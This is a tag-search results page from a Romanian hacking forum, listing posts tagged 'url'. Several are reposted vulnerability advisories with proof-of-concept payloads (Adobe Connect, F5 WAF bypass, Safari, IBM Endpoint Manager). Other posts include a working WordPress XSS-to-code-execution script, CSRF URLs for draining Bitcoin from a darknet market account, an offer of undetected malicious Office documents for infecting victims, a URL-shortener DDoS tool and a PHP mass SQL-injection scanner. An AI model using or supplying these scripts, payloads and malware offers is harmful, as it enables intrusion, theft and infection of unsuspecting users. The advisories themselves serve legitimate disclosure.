Jump to content

Search the Community

Showing results for tags 'url'.

  • Search By Tags

    Type tags separated by commas.
  • Search By Author

Content Type


Forums

  • Informatii generale
    • Anunturi importante
    • Bine ai venit
    • Proiecte RST
  • Sectiunea tehnica
    • Exploituri
    • Challenges (CTF)
    • Bug Bounty
    • Programare
    • Securitate web
    • Reverse engineering & exploit development
    • Mobile security
    • Sisteme de operare si discutii hardware
    • Electronica
    • Wireless Pentesting
    • Black SEO & monetizare
  • Tutoriale
    • Tutoriale in romana
    • Tutoriale in engleza
    • Tutoriale video
  • Programe
    • Programe hacking
    • Programe securitate
    • Programe utile
    • Free stuff
  • Discutii generale
    • RST Market
    • Off-topic
    • Discutii incepatori
    • Stiri securitate
    • Linkuri
    • Cosul de gunoi
  • Club Test's Topics
  • Clubul saraciei absolute's Topics
  • Chernobyl Hackers's Topics
  • Programming & Fun's Jokes / Funny pictures (programming related!)
  • Programming & Fun's Programming
  • Programming & Fun's Programming challenges
  • Bani pă net's Topics
  • Cumparaturi online's Topics
  • Web Development's Forum
  • 3D Print's Topics

Find results in...

Find results that contain...


Date Created

  • Start

    End


Last Updated

  • Start

    End


Filter by number of...

Joined

  • Start

    End


Group


Website URL


Yahoo


Jabber


Skype


Location


Interests


Biography


Location


Interests


Occupation

Found 16 results

  1. Se poate face url mask sau white labeling cand trimiti un link cuiva in chatul facebook? Sunt doar curios deoarece o persoana mi-a trimis un link de la leagueoflegends spunand ca vrea sa il lamuresc cu ceva, dupa 9 zile avea acces la conturile mele.Vreau sa stiu daca se poate face asa ceva ca sa ma feresc data viitoare, numai nespalati pe lumea asta care se bucura si ei cand prind fraieri ca mine.
  2. Advisory: Adobe Connect Reflected XSS Author: Stas Volfus (Bugsec Information Security LTD) Vendor URL: http://www.adobe.com/ Status: Vendor Notified ========================== Vulnerability Description ========================== Adobe Connect (Central) version: 9.3 is vulnerable to Reflected XSS (Cross Site Scripting). The attack allows execution of arbitrary JavaScript in the context of the user’s browser. CVE id: CVE-2015-0343 assigned for this issue. ========================== PoC ========================== The following URL demonstrates the vulnerability: https://vulnerablewebsite.com/admin/home/homepage/search?account-id=1&filter-rows=1&filter-start=0&now=yes&query=<a href="javascript:alert('XSS')">XSS Link</a> ========================== Disclosure Timeline ========================== 04-NOV-2014 - Vendor notified 01-DEC-2014 - CVE assigned 27-MAR-2015 - Resolved by vendor, fix deployed on Adobe Connect 9.4. ========================== References ========================== http://www.adobe.com/il_en/products/adobeconnect.html https://helpx.adobe.com/adobe-connect/release-note/connect-94-release-notes.html Source
  3. Details ======= Product: F5 BIG-IP Application Security Manager (ASM) Vulnerability: Web Application Firewall Bypass Author: Peter Lapp, lappsec () gmail com CVE: None assigned Vulnerable Versions: Confirmed 11.4.0, 11.4.1. Should apply to all releases. Fixed Version: None Summary ======= The F5 ASM is a web application firewall designed to protect web applications from attacks. Due to the way that the system processes JSON content, it's possible to bypass the ASM using a crafted request to a URL that processes both JSON and regular URL encoded requests. The vendor has acknowledged that this is an issue and has indicated that a fix will be released sometime in the future, but doesn't have a time frame and it's not a priority. I decided to release the details so anyone with a vulnerable configuration is aware of the risk and can act accordingly. Technical Details ================= The problem is that the ASM's JSON parser does not normalize URL encoded content. So it will block <script>, but not %3cscript%3e. This is fine unless you have a JSON profile applied to a URL that also processes normal x-www-form-urlencoded POST requests. In this case, it's possible to trick the ASM into thinking the request is JSON, URL encode your payload, and slip it through to the application. Granted, this bypass is limited to a specific configuration, but it's really not that uncommon to have a JSON profile applied to a URL that also processes other data. Possible scenarios include a generic JSON catchall, one automatically created by the policy builder, or you may have a web application that uses parameter based navigation (page=json goes to one page, page=search goes to another). In any case, if you have a JSON profile applied to a URL that also handles POST requests with x-www-form-urlencoded content, you're vulnerable. First, in order to bypass the ASM, you have to trick it into thinking the request content is JSON. In F5's documentation (https://support.f5.com/kb/en-us/products/big-ip_asm/manuals/product/asm-implementations-11-4-0/14.html), they recommend matching *json* in the Content-Type header. This is easily tricked by setting the header to "Content-Type: application/x-www-form-urlencoded; charset=UTF-8;json". I then tested setting it to only match on application/json, but that was still tricked by dual content-type headers: Content-Type: application/x-www-form-urlencoded; charset=UTF-8 Content-Type: application/json The application (running on Tomcat) processed the request as urlencoded, but the ASM processed it as JSON. >From here, passing through a malicious payload depends on the violations that are enabled on the security profile. If Malformed JSON is NOT enabled, you can just tag "json" onto the end of the content header(or double the header), URL encode special characters in your payload and send it away. In this case, a request like the following would not be blocked: POST / HTTP/1.1 Host: x.x.x.x Connection: keep-alive Content-Length: 168 Content-Type: application/x-www-form-urlencoded; charset=UTF-8;json search=%3cimg+src%3dx+onerror%3alert%280%29%3e If Malformed JSON violations are enabled, then the payload has to be valid JSON. A request like the one below will get past that. It's not pretty but it works. This request will get past the ASM with all the bells and whistles enabled. POST / HTTP/1.1 Host: x.x.x.x Connection: keep-alive Content-Length: 168 Content-Type: application/x-www-form-urlencoded; charset=UTF-8;json {"junkparam=&search=%3cimg+src%3dx+onerror%3dalert%280%29%3e&junkparam2=":"junk"} The ASM parses that as JSON and it is well formed so there aren't any errors. But the application is processing it as x-www-form-urlencoded so {"junkparam is just treated as a regular parameter name and the second parameter with the payload in it gets through. The last parameter is there just to close out the JSON format. Also, because JSON profiles don't check for meta characters in parameter names, it doesn't trigger an Illegal meta character in parameter name violation. If the payload looked like this {"param":"junkparam=&locationFilter=%3cimg+src%3dx+onerror%3dalert%280%29%3e&junkparam2="} then it would still get through but only if the illegal meta character in value violation was not set to block. Right now there is no fix for this issue and I haven't been able to find a way to block a request like the one above from getting through. I consulted F5's engineers and they said this was by design and there's no way to block it as of now. There will be a fix for this in the future, but until then make sure that your ASM profiles are as explicit as possible and you have compensating security controls for any URLs that this bypass would apply to. It's just another reason not to use a WAF as a band-aid for a vulnerable application! Feel free to contact me if you have any questions or additional information to add to this. Timeline ======== 1/19/2015 - Reported the issue to the vendor 2/26/2015 - The vendor confirms that it's a valid problem but are not going to release a fix in the near term. 3/13/2015 - Vendor product development creates ID 511951 to track the problem and consider adding a fix in a future major release. 5/5/2015 - Released info to FD. Source
  4. Exploit that uses a WordPress cross site scripting flaw to execute code as the administrator. /* Author: @evex_1337 Title: Wordpress XSS to RCE Description: This Exploit Uses XSS Vulnerabilities in Wordpress Plugins/Themes/Core To End Up Executing Code After The Being Triggered With Administrator Previliged User. ¯\_(?)_/¯ Reference: [url]http://research.evex.pw/?vuln=14[/url] Enjoy. */ //Installed Plugins Page plugins = (window.location['href'].indexOf('/wp-admin/') != - 1) ? 'plugins.php' : 'wp-admin/plugins.php'; //Inject "XSS" Div jQuery('body').append('<div id="xss" ></div>'); xss_div = jQuery('#xss'); xss_div.hide(); //Get Installed Plugins Page Source and Append it to "XSS" Div jQuery.ajax({ url: plugins, type: 'GET', async: false, cache: false, timeout: 30000, success: function (txt) { xss_div.html(txt); } }); //Put All Plugins Edit URL in Array plugins_edit = [ ]; xss_div.find('a').each(function () { if (jQuery(this).attr('href').indexOf('?file=') != - 1) { plugins_edit.push(jQuery(this).attr('href')); } }); //Inject Payload for (var i = 0; i < plugins_edit.length; i++) { jQuery.ajax({ url: plugins_edit[i], type: 'GET', async: false, cache: false, timeout: 30000, success: function (txt) { xss_div.html(txt); _wpnonce = jQuery('form#template').context.body.innerHTML.match('name="_wpnonce" value="(.*?)"') [1]; old_code = jQuery('form#template div textarea#newcontent') [0].value; payload = '<?php phpinfo(); ?>'; new_code = payload + '\n' + old_code; file = plugins_edit[i].split('file=') [1]; jQuery.ajax({ url: plugins_edit[i], type: 'POST', data: { '_wpnonce': _wpnonce, 'newcontent': new_code, 'action': 'update', 'file': file, 'submit': 'Update File' }, async: false, cache: false, timeout: 30000, success: function (txt) { xss_div.html(txt); if (jQuery('form#template div textarea#newcontent') [0].value.indexOf(payload) != - 1) { // Passed, this is up to you ( skiddies Filter ) injected_file = window.location.href.split('wp-admin') [0] + '/wp-content/plugins/' + file; // [url]http://localhost/wp//wp-content/plugins/504-redirects/redirects.php[/url] throw new Error(''); } } }); } }); } Source : WordPress 4.2.1 XSS / Code Execution
  5. OVERVIEW ========== The 4/8/2015 security updates from Apple included a patch for a Safari cross-domain vulnerability. An attacker could create web content which, when viewed by a target user, bypasses some of the normal cross-domain restrictions to access or modify HTTP cookies belonging to any website. Most websites which allow user logins store their authentication information (usually session keys) in cookies. Access to these cookies would allow hijacking authenticated sessions. Cookies can also contain other sensitive information. All tested Safari versions on iOS, OS X, and Windows were vulnerable. The number of affected devices may be of the order of 1 billion. Technically, the attacker can spoof the âdocument.domainâ property. Itâs possible that this could lead to compromise of other resources apart from cookies. However, cookies was the only practical attack scenario found with the tested versions of Safari. The HttpOnly and Secure cookie flags represent an important mitigating factor albeit with some caveats (see below). DETAILS ======== Safari supports the FTP URL scheme allowing HTML documents to be accessed via URLs beginning with "ftp://". These URLs can be of the form [url]ftp://user:password@host/path[/url]. The problem arises when encoded special characters are used in the user or password parts. Consider the following URL: [url]ftp://user%40attacker.com%2Fexploit.html%23@apple.com/[/url] If correctly interpreted, the URL refers to a document on apple.com. However, when loaded by a vulnerable browser, the network layer uses an extraneously decoded version of the URL: [url]ftp://user@attacker.com/exploit.html#apple.com/[/url] The document would be loaded from attacker.com, not apple.com. Yet the document properties such as âdocument.domainâ and âdocument.cookieâ are correctly initialised using âapple.comâ. The attacker-supplied document, exploit.html, can therefore access and modify cookies belonging to apple.com via JavaScript. Itâs possible that cookies arenât the only resource accessible this way, but at least recent Safari versions (tested desktop only) use the document origin instead of only host or domain for most other access control, e.g. password autofilling and geolocation permissions. The attack can be performed on normal web pages by embedding an IFRAME pointing to an FTP URL. MITIGATING FACTORS =================== The cookie attack requires JavaScript so existing cookies with the HttpOnly flag canât be seen by the attacker. Support for this flag reportedly appeared in Safari 4. Earlier versions would be vulnerable even with the HttpOnly flag. Safari allows (over)writing of HttpOnly cookies so the flag doesnât prevent this vulnerability to be exploited for session fixation and similar attacks. Cookies with the Secure flag arenât accessible for documents loaded via FTP. VULNERABLE VERSIONS ===================== The following versions were tested and found vulnerable: - Safari 7.0.4 on OS X 10.9.3 - Safari on iPhone 3GS, iOS 6.1.6 - Safari on iOS 8.1 simulator - Safari 5.1.7 on Windows 8.1 Earlier versions werenât available for testing, but according to available statistics their usage should be negligible. SOLUTION ========= Apple was notified on January 27, 2015. The following patches were released in April 2015: - APPLE-SA-2015-04-08-3 iOS 8.3 - iPhone 4s and later, iPod touch (5th generation) and later, iPad 2 and later - APPLE-SA-2015-04-08-1 Safari 8.0.5, Safari 7.1.5, and Safari 6.2.5 - OS X Mountain Lion, Mavericks, Yosemite For more information see: [url]https://support.apple.com/en-us/HT201222[/url] WORKAROUND ============= The attacker has to set up an FTP server or use an existing public one. Such server can run on any TCP/IP port number. One way to stop such attacks (e.g. for older devices with no available patch) would be to deny all traffic to the public internet and configure the device to use a HTTP proxy located in the internal network. This should prevent access to all FTP URLs. CREDITS ======== The vulnerability was found and researched by Jouko Pynn??nen of Klikki Oy, Finland. -- Jouko Pynnonen <jouko@iki.fi> Klikki Oy - [url=http://klikki.fi]Klikki Oy -[/url] - @klikkioy Source: http://packetstorm.wowhacker.com/1504-exploits/safari-crossdomain.txt
  6. wig is a web application information gathering tool, which can identify numerous Content Management Systems and other administrative applications. The application fingerprinting is based on checksums and string matching of known files for different versions of CMSes. This results in a score being calculated for each detected CMS and its versions. Each detected CMS is displayed along with the most probable version(s) of it. The score calculation is based on weights and the amount of "hits" for a given checksum. wig also tries to guess the operating system on the server based on the 'server' and 'x-powered-by' headers. A database containing known header values for different operating systems is included in wig, which allows wig to guess Microsoft Windows versions and Linux distribution and version. wig features: CMS version detection by: check sums, string matching and extraction Lists detected package and platform versions such as asp.net, php, openssl, apache Detects JavaScript libraries Operation system fingerprinting by matching php, apache and other packages against a values in wig's database Checks for files of interest such as administrative login pages, readmes, etc Currently the wig's databases include 28,000 fingerprints Reuse information from previous runs (save the cache) Implement a verbose option Remove dependency on 'requests' Support for proxy Proper threading support Included check for known vulnerabilities Requirements wig is built with Python 3, and is therefore not compatible with Python 2. There are various other tools which perform similar functions such as CMS identification and issue detection: – CMSmap – Content Management System Security Scanner – Droopescan – Plugin Based CMS Security Scanner – WhatWeb – Identify CMS, Blogging Platform, Stats Packages & More – BlindElephant – Web Application Fingerprinter – Web-Sorrow v1.48 – Version Detection, CMS Identification & Enumeration – Wappalyzer – Web Technology Identifier (Identify CMS, JavaScript etc.) – WPScan – WordPress Security/Vulnerability Scanner How it works The default behavior of wig is to identify a CMS, and exit after version detection of the CMS. This is done to limit the amount of traffic sent to the target server. This behavior can be overwritten by setting the '-a' flag, in which case wig will test all the known fingerprints. As some configurations of applications do not use the default location for files and resources, it is possible to have wig fetch all the static resources it encounters during its scan. This is done with the '-c' option. The '-m' option tests all fingerprints against all fetched URLs, which is helpful if the default location has been changed. Help Screen usage: wig.py [-h] [-l INPUT_FILE] [-n STOP_AFTER] [-a] [-m] [-u] [--no_cache_load] [--no_cache_save] [-N] [--verbosity] [--proxy PROXY] [-w OUTPUT_FILE] [url] WebApp Information Gatherer positional arguments: url The url to scan e.g. http://example.com optional arguments: -h, --help show this help message and exit -l INPUT_FILE File with urls, one per line. -n STOP_AFTER Stop after this amount of CMSs have been detected. Default: 1 -a Do not stop after the first CMS is detected -m Try harder to find a match without making more requests -u User-agent to use in the requests --no_cache_load Do not load cached responses --no_cache_save Do not save the cache for later use -N Shortcut for --no_cache_load and --no_cache_save --verbosity, -v Increase verbosity. Use multiple times for more info --proxy PROXY Tunnel through a proxy (format: localhost:8080) -w OUTPUT_FILE File to dump results into (JSON) Example of run: $ ./wig.py example.com dP dP dP dP .88888. 88 88 88 88 d8' `88 88 .8P .8P 88 88 88 d8' d8' 88 88 YP88 88.d8P8.d8P 88 Y8. .88 8888' Y88' dP `88888' WebApp Information Gatherer Redirected to http://www.example.com. Continue? [Y|n]: TITLE --- HTML TITLE --- IP 255.255.255.256 SOFTWARE VERSION CATEGORY Drupal 7.28 | 7.29 | 7.30 | 7.31 | 7.32 CMS ASP.NET 4.0.30319.18067 Platform Microsoft-HTTPAPI 2.0 Platform Microsoft-IIS 6.0 | 7.0 | 7.5 | 8.0 Platform Microsoft Windows Server 2003 SP2 | 2008 | 2008 R2 | 2012 Operating System SOFTWARE VULNERABILITIES LINK Drupal 7.28 7 http://cvedetails.com/version/169265 Drupal 7.29 3 http://cvedetails.com/version/169917 Drupal 7.30 3 http://cvedetails.com/version/169916 URL NOTE CATEGORY /login/ Test directory Interesting URL /login/index_form.html ASP.NET detailed error Interesting URL /robots.txt robots.txt index Interesting URL /test/ Test directory Interesting URL _______________________________________________________________________________ Time: 15.7 sec Urls: 351 Fingerprints: 28989 Link: https://github.com/jekyc/wig
  7. *Innovative WebPAC Pro 2.0 Unvalidated Redirects and Forwards (URL Redirection) Security Vulnerabilities* Exploit Title: Innovative WebPAC Pro 2.0 /showres url parameter URL Redirection Security Vulnerabilities Vendor: Innovative Interfaces Inc Product: WebPAC Pro Vulnerable Versions: 2.0 Tested Version: 2.0 Advisory Publication: March 14, 2015 Latest Update: March 14, 2015 Vulnerability Type: URL Redirection to Untrusted Site ('Open Redirect') [CWE-601] CVE Reference: * Impact CVSS Severity (version 2.0): CVSS v2 Base Score: 5.8 (MEDIUM) (AV:N/AC:M/Au:N/C:P/I:P/A:N) (legend) Impact Subscore: 4.9 Exploitability Subscore: 8.6 Discover and Author: Wang Jing [CCRG, Nanyang Technological University (NTU), Singapore] *Suggestion Details:* *(1) Vendor & Product Description:* *Vendor:* Innovative Interfaces Inc *Product & Version:* WebPAC Pro 2.0 *Vendor URL & Download:* WebPAC Pro can be got from here, http://www.iii.com/products/webpac_pro.shtml http://lj.libraryjournal.com/2005/12/ljarchives/innovative-releasing-webpac-pro/ *Libraries that have installed WebPac Pro:* https://wiki.library.oregonstate.edu/confluence/display/WebOPAC/Libraries+that+have+installed+WebPac+Pro *Product Introduction Overview:* "Today, some libraries want to enhance their online presence in ways that go beyond the traditional OPAC and the "library portal" model to better integrate the latest Web functionality. With WebPAC Pro, libraries will be able to take advantage of the latest Web technologies and engage Web-savvy users more effectively than ever before. WebPAC Pro is a complete update of the Web OPAC interface" "WebPAC Pro breaks through the functional and design limitations of the traditional online catalog. Its solid technology framework supports tools for patron access such as Spell Check; integrated Really Simple Syndication (RSS) feeds; a suite of products for seamless Campus Computing; and deep control over information content and presentation with Cascading Style Sheets (CSS). WebPAC Pro is also a platform for participation when integrated with Innovative's Patron Ratings features and Community Reviews product. What's more, with WebPAC Pro's RightResult™ search technology, the most relevant materials display at the top so patrons get to the specific items or topics they want to explore immediately. WebPAC Pro can also interconnect with Innovative's discovery services platform, Encore. And for elegant access through Blackberry® Storm™ or iPhone™, the AirPAC provides catalog searching, item requesting, and more." *(2) Vulnerability Details:* WebPAC Pro web application has a security bug problem. It can be exploited by Unvalidated Redirects and Forwards (URL Redirection) attacks. This could allow a user to create a specially crafted URL, that if clicked, would redirect a victim from the intended legitimate web site to an arbitrary web site of the attacker's choosing. Such attacks are useful as the crafted URL initially appear to be a web page of a trusted site. This could be leveraged to direct an unsuspecting user to a web page containing attacks that target client side software such as a web browser or document rendering programs. Other Innovative Interfaces products vulnerabilities have been found by some other bug hunter researchers before. Innovative has patched some of them. NVD is the U.S. government repository of standards based vulnerability management data (This data enables automation of vulnerability management, security measurement, and compliance (e.g. FISMA)). It has published suggestions, advisories, solutions related to Innovative vulnerabilities. *(2.1) *The first code programming flaw occurs at "showres?" page with "&url" parameter. *References:* http://tetraph.com/security/open-redirect/innovative-webpac-pro-2-0-unvalidated-redirects-and-forwards-url-redirection-security-vulnerabilities/ http://securityrelated.blogspot.com/2015/03/innovative-webpac-pro-20-unvalidated.html http://www.inzeed.com/kaleidoscope/computer-web-security/innovative-webpac-pro-2-0-unvalidated-redirects-and-forwards-url-redirection-security-vulnerabilities/ http://diebiyi.com/articles/%E5%AE%89%E5%85%A8/innovative-webpac-pro-2-0-unvalidated-redirects-and-forwards-url-redirection-security-vulnerabilities/ https://infoswift.wordpress.com/2015/03/14/innovative-webpac-pro-2-0-unvalidated-redirects-and-forwards-url-redirection-security-vulnerabilities/ http://marc.info/?l=full-disclosure&m=142527148510581&w=4 http://en.hackdig.com/wap/?id=17054 -- Wang Jing, Division of Mathematical Sciences (MAS), School of Physical and Mathematical Sciences (SPMS), Nanyang Technological University (NTU), Singapore. http://www.tetraph.com/wangjing/ https://twitter.com/tetraphibious Source
  8. # Exploit Title: ocPortal 9.0.16 Multiply XSS Vulnerabilities # Google Dork: "Copyright (c) ocPortal 2011 " # Date: 26-2-2015 # Exploit Author: Dennis Veninga # Vendor Homepage: http://ocportal.com/ # Vendor contacted: 22-2-2015 # Fix: http://ocportal.com/site/news/view/security_issues/xss-vulnerability-patch.htm # Version: 9.0.16 # Tested on: Firefox 36 & Chrome 38 / W8.1-x64 ocPortal -> Version: 9.0.16 Type: XSS Severity: Critical Info Exploit: There are MANY possibilities to execute XSS on the new released ocPortal. All XSS attacks are done by a new registered user, so no extra rights are given. It's all standard. ####################################################### Events/Calendar, vulnerable to XSS attack: URL: http://{target}/ocportal/cms/index.php?page=cms_calendar&type=ad Title & text field, enter XSS code in both fields. Somewhere else the title XSS is executed, and elsewhere the Text/info XSS code is executed. When entering an XSS attack, on the events page, when mouse-over the just made event, it also reproduces an XSS. URL: http://{target}/ocportal/index.php?page=calendar&type=misc&id=2015-02&view=month XSS Vulnerability on the events which ALSO affects the Admin Panel, when Admin visits the panel and wants to edit it. ####################################################### Poll, vulnerable to XSS-attack. URL: http://{yourwebsite}/ocportal/cms/index.php?page=cms_polls&type=ad Just fill some XSS-code into the fields. Publish and see the result ####################################################### Forum, vulnerable to XSS-attack URL: http://{target}/ocportal/forum/index.php?page=topics&type=new_topic&id=2 Creating a new topic with all the fields XSS-ed, performs the XSS attack when an user is browsing the homepage. This is happening when the active topics are shown on the index page. But on the forum page itself, it isn't working. ####################################################### New PT (private topic/private message), vulnerable to XSS-attack URL: http://{target}/ocportal/forum/index.php?page=topics&type=new_pt Now, because I got a new private message, this XSS is executed everywhere!! ####################################################### Source
  9. Ladies and gentlemen Boys and girls It come to our attention that a brave warrior for the people Ross William Ulbricht was unlawfully convicted by the corporation known as the American government. This mockery of justice has not gone unnoticed. In order to protect the next generation of darknet markets we will be disclosing vulnerabilities for these sites in order to make these sites safer from attack. To start, the Agora Marketplace contains a CSRF vulnerability which can be used to drain a victim account of all of their Bitcoins. The following URLs can be used to perform this attack: URL to start PIN reset: http://agorahooawayyfoe.onion/startresetpin?action=askresetpinaction&controller=user&confirmed=true&confirm-submit= URL to change current PIN: http://agorahooawayyfoe.onion/resetpin?pin1=1337&pin2=1337&submit=Save URL to send bitcoins using the new pin: http://agorahooawayyfoe.onion/sendbitcoins?targetaddress=[YOUR_BTC_ADDY]&withdrawschedule=0&targetamount=1&walletpin=1337&submit=Send These are all GET requests and don't require JavaScript to work. NoScript cannot save you from poor coding practices. There will be more to come. Stay safe. Stay anonymous. -The Guardians of Peace Source
  10. Advisory: Cross-Site Scripting in IBM Endpoint Manager Relay Diagnostics Page During a penetration test, RedTeam Pentesting discovered that the IBM Endpoint Manager Relay Diagnostics page allows anybody to persistently store HTML and JavaScript code that is executed when the page is opened in a browser. Details ======= Product: IBM Endpoint Manager Affected Versions: 9.1.x versions earlier than 9.1.1229, 9.2.x versions earlier than 9.2.1.48 Fixed Versions: 9.1.1229, 9.2.1.48 Vulnerability Type: Cross-Site Scripting Security Risk: medium Vendor URL: http://www-03.ibm.com/software/products/en/endpoint-manager-family Vendor Status: fixed version released Advisory URL: https://www.redteam-pentesting.de/advisories/rt-sa-2014-013 Advisory Status: published CVE: CVE-2014-6137 CVE URL: https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-6137 Introduction ============ IBM Endpoint Manager products - built on IBM BigFix technology - can help you achieve smarter, faster endpoint management and security. These products enable you to see and manage physical and virtual endpoints including servers, desktops, notebooks, smartphones, tablets and specialized equipment such as point-of-sale devices, ATMs and self-service kiosks. Now you can rapidly remediate, protect and report on endpoints in near real time. (from the vendor's homepage) More Details ============ Systems that run IBM Endpoint Manager (IEM, formerly Tivoli Endpoint Manager, or TEM) components, such as TEM Root Servers or TEM Relays, typically serve HTTP and HTTPS on port 52311. There, the server or relay diagnostics page is normally accessible at the path /rd. That page can be accessed without authentication and lets users query and modify different information. For example, a TEM Relay can be instructed to gather a specific version of a certain Fixlet site by requesting a URL such as the following: http://tem-relay.example.com:52311/cgi-bin/bfenterprise/ BESGatherMirrorNew.exe/-gatherversion ?Body=GatherSpecifiedVersion &url=http://tem-root.example.com:52311/cgi-bin/bfgather.exe/actionsite &version=1 &useCRC=0 The URL parameter url is susceptible to cross-site scripting. When the following URL is requested, the browser executes the JavaScript code provided in the parameter: http://tem-relay.example.com:52311/cgi-bin/bfenterprise/ BESGatherMirrorNew.exe/-gatherversion ?Body=GatherSpecifiedVersion &version=1 &url=http://"><script>alert(/XSS/)</script> &version=1 &useCRC=0 The value of that parameter is also stored in the TEM Relay's site list, so that the embedded JavaScript code is executed whenever the diagnostics page is opened in a browser: $ curl http://tem-relay.example.com:52311/rd [...] <select NAME="url"> [...] <option>http://"><script>alert(/XSS/)</script></option> </select> Proof of Concept ================ http://tem-relay.example.com:52311/cgi-bin/bfenterprise/ BESGatherMirrorNew.exe/-gatherversion ?Body=GatherSpecifiedVersion&version=1 &url=http://"><script>alert(/XSS/)</script> &version=1 &useCRC=0 Fix === Upgrade IBM Endpoint Manager to version 9.1.1229 or 9.2.1.48. Security Risk ============= As the relay diagnostics page is typically not frequented by administrators and does not normally require authentication, it is unlikely that the vulnerability can be exploited to automatically and reliably attack administrative users and obtain their credentials. Nevertheless, the ability to host arbitrary HTML and JavaScript code on the relay diagnostics page, i.e. on a trusted system, may allow attackers to conduct very convincing phishing attacks. This vulnerability is therefore rated as a medium risk. Timeline ======== 2014-07-29 Vulnerability identified during a penetration test 2014-08-06 Customer approves disclosure to vendor 2014-09-03 Vendor notified 2015-01-13 Vendor releases security bulletin and software upgrade 2015-02-04 Customer approves public disclosure 2015-02-10 Advisory released RedTeam Pentesting GmbH ======================= RedTeam Pentesting offers individual penetration tests, short pentests, performed by a team of specialised IT-security experts. Hereby, security weaknesses in company networks or products are uncovered and can be fixed immediately. As there are only few experts in this field, RedTeam Pentesting wants to share its knowledge and enhance the public knowledge with research in security-related areas. The results are made available as public security advisories. More information about RedTeam Pentesting can be found at https://www.redteam-pentesting.de. -- RedTeam Pentesting GmbH Tel.: +49 241 510081-0 Dennewartstr. 25-27 Fax : +49 241 510081-99 52068 Aachen https://www.redteam-pentesting.de Germany Registergericht: Aachen HRB 14004 Geschäftsführer: Patrick Hof, Jens Liebchen Source
  11. lets keep words very short just finished a very simple exploit project and will be giving all member who post on here ( and pm me with direct url of their file ) will get a fully undetected doc exploited document. victims need to Enable Content to be able to get infected. post and pm method is to avoid leechers, sorry. Post here you need and pm me your url. i will respond to your pm when i see your post on thread. Lets rock guys. Scan URL: Scan4You.net - Online Anonymous Virus and Malware Scan PLEASE MAKE SURE YOUR FILE.EXE IS Fully Undetectable (FUD) BEFORE SENDING ME URL. PS; if i did not reply your pm in time, you can chat me on ym,jabber Yahoo IM: ratsetup247 Jabber : ratsetup247@exploit.im
  12. Malicious URL Shortener + HTML5 DDoS PoC This project demonstrates the serious consequences of the Internet's increased reliance upon URL shortners, as well as how easy it is to create an unwitting DDoS botnet using new HTML5 features without actually exploiting a single computer. It is intended only for demonstration and testing purposes; if you target a site that is not yours, you are responsible for the consequences. Download: http://d0z-me.googlecode.com/files/d0z-me-0.2.tar.gz
  13. Am decis sa postez aici o lista cu mai multe siteuri de analizat malware , url si antivirusi online. Sper sa va fie de folos:) Malware Scan http://www.virustotal.com/ [File and Website] Jotti's malware scan Anubis: Analyzing Unknown Binaries VirSCAN.org - Free Multi-Engine Online Virus Scanner v1.02, Supports 37 AntiVirus Engines! ThreatExpert - Online File Scanner Public Sandbox - Submit a Sample for Malware Analysis Eureka Malware Analysis Page Wepawet - Home [File and Website] https://www.metascan-online.com/ Xandora - Your Online Binary Analyser Free Online Multi Engine Antivirus File and URL Scanner - Powered by NoVirusThanks.org [File and Website] Irish Cream Service - Free Antivirus Scan Service [File and Website] ScanThis! Free online virus scanner [File and Website] Zscaler Zulu URL Risk Analyzer - Zulu Website Scan Automated Exploit Analysis Online Virus Scanner - Scan Links for Malware, Trojans and Viruses Sucuri SiteCheck - Free Website Malware Scanner Online Webpage Scanning for Malware Attacks | Web Inspector Online Scan urlquery.net - Free URL scanner Servicio de seguridad web, desenmascarame Scan websites for exploits, malware and other malicious threats using multiple web reputation engines and domain blacklists jsunpack - a generic JavaScript unpacker [Website, Javascript, PDF, HTML and pcap] Website/URL/Link Scanner Safety Check for Phishing, Malware, Viruses - ScanURL.net AVG Online Virus Scanner | Scan Web Pages | AVG LinkScanner Drop Zone FREE Online Website Malware Scanner | Website Security Monitoring & Malware Removal | Quttera Dr.Web online scanners https://www.trustedsource.org/?p=mcafee UrlScan 3.1 : The Official Microsoft IIS Site UnThreat Online Scanner Antivirus Online http://quickscan.bitdefender.com/ro/ Free Online Virus Scan - Bitdefender Online Virus Scanner ESET Free Online Scanner :: Complete Malware Detection :: ESET Emsisoft Web Malware Scan | Dual-Engine Browser Scanner - Free removal of Viruses, Bots, Spyware, Keyloggers, Trojans and Rootkits Free Online Virus Scan - Antivirus Software - Trend Micro USA Panda Activescan | Free Online Antivirus | Free Virus Disinfection - Panda Security https://www.grc.com/x/ne.dll?bh0bkyd2 :: WindowSecurity.com How To - Remove threats - Removal Tools | F-Secure Rising Online Virus Scanner FREE ANTIVIRUS online: ActiveScan 2.0 - PANDA SECURITY https://security.symantec.com/sscv6/GetBrowser.asp?pkj=QTHYGXMQPHPUCCBMMHL&langid=ie&venid=sym&plfid=00&from=/sscv6/home.asp PC Flank: Make sure you're protected on all sides. Sursa: cleanbytes.net/malware-online-scanners
  14. Am facut un mic script care scaneaza adresele url puse de voi intr-un fisier text. Nu e prea sofisticat, dar o sa ii mai aduc imbunatatiri. <?php echo'<title>URL List SQLi scanner</title>'; echo "<u><tr>Utilizare:</tr></br></u> Creeaza un fisier adrese.txt in care sa existe pe fiecare linie cate o adresa url</br> in formatul http://url.tld . Url-urile vulnerabile vor fi afisate si vor fi salvate si in fisierul bune.txt</br></br>"; $fisier = file_get_contents('adrese.txt'); // Citeste lista cu url-uri $linii = explode("\n", $fisier); // Preia fiecare url $fisier = fopen("bune.txt", "a"); // Aici le va pune pe cele vulnerabile echo"<u>Url-uri vulnerabile:</u></br></br>"; for($i = 0; $i < count($linii) - 1; $i++) scann($linii[$i]); // Testeaza fiecare url function scann($sqli) { global $fisier; $sintaxa="'"; $fraza=file_get_contents("$sqli$sintaxa"); $cuvant="error in your SQL syntax"; $pos = strpos($fraza,$cuvant); if($pos === false) { $ok=0; } else { $ok=1; } if($ok==1) { fwrite($fisier, $sqli . "\n"); // Scrie in bune.txt url-urile vulnerabile echo"$sqli <br>"; // Afiseaza url-urile vulnerabile } } fclose($fisier); // Inchide fisierul echo '<center></br></br>URL List SQLi Scanner v1.0 - Silvian0 @ <a href="http://rstcenter.com">RSTCenter.com</a></center>'; ?>
